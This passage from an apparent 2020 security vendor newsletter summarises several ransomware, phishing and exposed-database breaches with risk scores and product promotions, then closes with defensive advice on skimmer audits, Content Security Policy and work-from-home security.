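Run it on a schedule from outside the shop (fetching the page the way a customer's browser would), because a skimmer can also be served from a compromised CDN or tag manager rather than from the shop's own code. The same baseline feeds a Content Security Policy: every host in the allowlist becomes a script-src entry, and the inline hashes become 'sha256-...' sources, so the browser itself refuses anything the audit would flag.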

THREAT FOCUS: Finastra Technology - CANADA

https://krebsonsecurity.com/2020/03/security-breach-disrupts-fintech-firm-finastra/


Exploit: Ransomware 

Finastra: Financial technology provider

Risk to Small Business: 2.556 = Severe

A ransomware attack has forced Finastra to bring its Canadian services offline temporarily. The company worked quickly to secure its IT infrastructure after detecting the breach, but those efforts will not alleviate the high recovery and reputational cost of the incident. Finastra believes that company and customer data is secure, and that customer and employee data was not exposed or exfiltrated, nor were client networks impacted.

Individual Risk: None

Customers Impacted: Unknown

Effect On Customers: Ransomware attacks are on the rise and uniquely consequential, carrying incredible repair costs and unparalleled opportunity costs as companies are rendered unable to conduct business and employees are left unable to work. Since there are no satisfying solutions to a ransomware attack once it strikes, companies should turn their attention to ensuring that their cyber defensive capabilities can turn away this growing threat.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an 'Essential 8' Digital Security Audit we offer a remote-access, independent, real-time audit of our clients' critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

It's the first step to real cyber security. Call Avantia's office on 07 30109711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit

THREAT FOCUS: Data Deposit Box - CANADA

https://www.securitymagazine.com/articles/91985-data-breach-report-cloud-storage-exposes-users-private-information


Exploit: Unsecured database 

Data Deposit Box: Cloud storage provider

Risk to Small Business: 2.334 = Severe

Cybersecurity researchers identified an unsecured database containing thousands of customer files uploaded to the company's secure cloud storage service. The exposed records include information dating back to 2016, which the company eventually secured. However, it's unclear how long cybercriminals could have accessed this data or why it took Data Deposit Box nearly a week to close the database after being notified that it wasn't password protected.

Individual Risk: 2.428 = Severe

The exposed database includes users' personally identifiable information that was uploaded to the cloud service, including admin login credentials, IP addresses, email addresses, and GUIDs. The login credentials were stored in plain text, so those impacted by the breach should immediately change their Data Deposit Box password and any other account credentials using the same password combination.

Customers Impacted:  270,000

Effect On Customers: The cost of a data breach is at an all-time high, and it’s expected to continue climbing higher in the years ahead. An unforced error, like failing to password protect a database, is especially troubling for a company that is trusted to provide secure services. As a result of this seeming carelessness, Data Deposit Box has undermined its core value proposition and incurred a costly recovery process, both of which were entirely avoidable.

Risk Levels:

1 – 1.5 = Extreme Risk
1.51 – 2.49 = Severe Risk
2.5 – 3 = Moderate Risk
*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: Good passwords are the single fastest way to secure your data. With AuthAnvil, you can protect your employees’ password integrity. Our integrated multi-factor authentication, single sign-on, and identity management solutions will protect your credentials and your data. Find out more at:  https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 3010 9711 (Office Hours)

THREAT FOCUS: Hammersmith Medicines Research - UNITED KINGDOM

https://www.forbes.com/sites/daveywinder/2020/03/23/covid-19-vaccine-test-center-hit-by-cyber-attack-stolen-data-posted-online/#584bcdc818e5


Exploit: Ransomware  

Hammersmith Medicines Research: Medical testing provider.  

Risk to Small Business: 2.112 = Severe Hammersmith Medicines Research was hit with a ransomware attack that encrypted its systems and stole company data that was later posted online. This incident is particularly ill-timed as Hammersmith Medicines Research is a provider of critical COVID-19 testing. The attack was perpetrated by the Maze ransomware group, who previously promised not to attack healthcare facilities during the COVID-19 outbreak. It’s a reminder that there is no honor among thieves, and companies should not use their promises as an excuse to avoid putting their best foot forward when it comes to cybersecurity.

Individual Risk: 2.714 = Moderate It’s clear that cybercriminals exfiltrated company data in the attack. However, the Maze attackers only published a sample online, intending to pressure the company into paying the ransom. All patients and employees should assume that their personal information was compromised, and they should carefully monitor their accounts for unusual activity or messages.

Customers Impacted: Unknown

Effect On Customers: As we reported previously, healthcare providers are an especially enticing target for cybercriminals because they collect and store uniquely sensitive and valuable information. In 2020, many ransomware attacks also include a data breach,  incurring the ire of regulators and clients. Every healthcare provider has millions of reasons to prevent a ransomware attack before it strikes.

Risk Levels:

1 – 1.5 = Extreme Risk
1.51 – 2.49 = Severe Risk
2.5 – 3 = Moderate Risk
*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote-access, independent, real-time audit of our clients’ critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

It’s the first step to real cyber security. Call Avantia’s office on 07 3010 9711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit


THREAT FOCUS: Norwegian Cruise Line - EUROPEAN UNION

http://techgenix.com/norwegian-cruise-line-data-breach/


Exploit: Phishing scam

Norwegian Cruise Line: Cruise tourism provider

Risk to Small Business: 2.334 = Severe A Norwegian Cruise Line employee was reeled in by a phishing scam that compromised the personal details of thousands of independent travel agents. The information was then posted on Dark Web forums, making it widely accessible to bad actors. The company, already reeling from the COVID-19 crisis, has now damaged its relationship with partners that are critical to its recovery.    

Individual Risk: 2.714 = Moderate The data breach includes plain text passwords and email addresses for thousands of travel agents. While many are associated with TUI and Virgin Holidays, it also covers independent agents and those working with other organizations. Those impacted by the breach should immediately reset their login credentials while also monitoring their accounts for unusual or suspicious activity.

Customers Impacted: 27,000

Effect On Customers: This incident underscores the heightened risk and outsized consequences of falling for scams during the COVID-19 crisis. With more employees working remotely and a general, pervasive sense of uncertainty overshadowing many companies, there is a higher risk of damage from cyberattacks such as phishing and ransomware, which anxious employees are more likely to encounter and interact with.

Risk Levels:

1 – 1.5 = Extreme Risk
1.51 – 2.49 = Severe Risk
2.5 – 3 = Moderate Risk
*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote-access, independent, real-time audit of our clients’ critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation. It’s the first step to real cyber security. Call Avantia’s office on 07 3010 9711 or visit: https://www.avantiacybersecurity.com/cyber-security-audit



THREAT FOCUS: Henning Harders Logistics - AUSTRALIA  

https://www.itwire.com/security/ransomware-group-said-to-be-publishing-freight-forwarding-firm-s-data.html


Exploit: Ransomware

Henning Harders: Freight forwarding and logistics firm  

Risk to Small Business: 2.556 = Moderate Henning Harders was the victim of a ransomware attack that restricted its operations between March 15 and March 18. However, the company, which refused to pay the ransom demand, is having continual cybersecurity trouble. Hackers have begun posting the company’s stolen data on the Dark Web and using the information to send spear phishing emails to employees. While the company is touting its restored operations, it’s clear that it will have to deal with a lingering data security issue that will not be resolved quickly.

Individual Risk: 2.857 = Moderate

Customers Impacted: Unknown

Effect On Customers: Increasingly, ransomware attacks are just a first step for cybercriminals, who will continue to exploit businesses by selling company data on the Dark Web or using it to run phishing scams. The high recovery expense, opportunity cost, reputational damage, and productivity degradation of ransomware attacks make this growing menace a uniquely harrowing cyber risk.

Risk Levels:

1 – 1.5 = Extreme Risk
1.51 – 2.49 = Severe Risk
2.5 – 3 = Moderate Risk
*The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID monitors the Dark Web to find out if your employee or customer data has been compromised. We work with Clients to strengthen their security suite by offering industry-leading detection. Discover more at: https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 3010 9711 (Office Hours)

 

POSTSCRIPT:


Expert Cybersecurity Tips for Working From Home   

The COVID-19 pandemic has brought about an unprecedented work-from-home experiment as social distancing measures require millions of employees around the world to work from home. As we’ve already seen, this presents unique cybersecurity challenges for both companies and their employees. To help you secure data while working remotely, here are four simple steps that every company and employee can take.

1. Use a trusted VPN. These services can provide a layer of protection by encrypting network traffic and making it more difficult for bad actors to spy on your activity. Choose a reputable VPN provider, as a number of VPN scams have tricked employees into downloading malicious software that steals their login credentials.

2. Enable two-factor authentication. Account security is critical, especially when entire companies are working remotely. Enabling two-factor authentication is an affordable and effective way to keep company accounts secure at all times.  

3. Refrain from using personal devices. Many employees may be tempted to use personal devices for work-related tasks, especially when working from home. It’s always possible that these devices contain malware or other exploits that could compromise company data.  

4. Look out for Phishing Scams. Cybercriminals are always looking for ways to capitalise on our vulnerabilities. At this moment, COVID-19-related phishing scams abound, targeting employees’ sense of isolation and vulnerability to capture critical information.  


Social Isolation Puts Company Data at Risk 

As the COVID-19 pandemic continues to cause chaos for businesses, we continue to be committed to helping keep your data secure. To that end, we’ve compiled several resources to help you navigate this unique terrain, and if we can serve you in any way, please don’t hesitate to contact us.     

This week, we wanted to highlight a cybersecurity vulnerability that is especially relevant as many people work from home and practice social distancing. According to a study by the Better Business Bureau, the FINRA Investor Education Foundation, and the Stanford Center on Longevity, people are more likely to fall for a scam when they are socially isolated. Cybercriminals are already taking advantage of our new digital environment, sending a flurry of phishing and other fraudulent messages meant to compromise personal and company data, and isolated employees are more vulnerable than usual to these attack methods. Therefore, in addition to preparing employees for this troubling trend, make an effort to reach out to employees, coworkers, and family members to make personal connections during this challenging time.


 

Disclaimer*:

Avantia Corporate Services Pty Ltd T/A Avantia Cyber Security provides the content in this publication to the reader for general information purposes only and has compiled the content from a number of sources in Australia, the USA, and up to 56 other countries who provide cyber breach and cyber security information to us in real time. Given their international focus and experience in the cyberspace arena we believe their data to be accurate and reliable; however, we give no warranty (implied or otherwise) as to the content’s accuracy or fitness for use. No validation or investigation has been performed by Avantia Corporate Services or the Author as to its accuracy or reliability. Readers should conduct their own investigation and come to their own conclusions before taking any action.

*COPYRIGHT 2020* Avantia Corporate Services - All Rights Reserved.
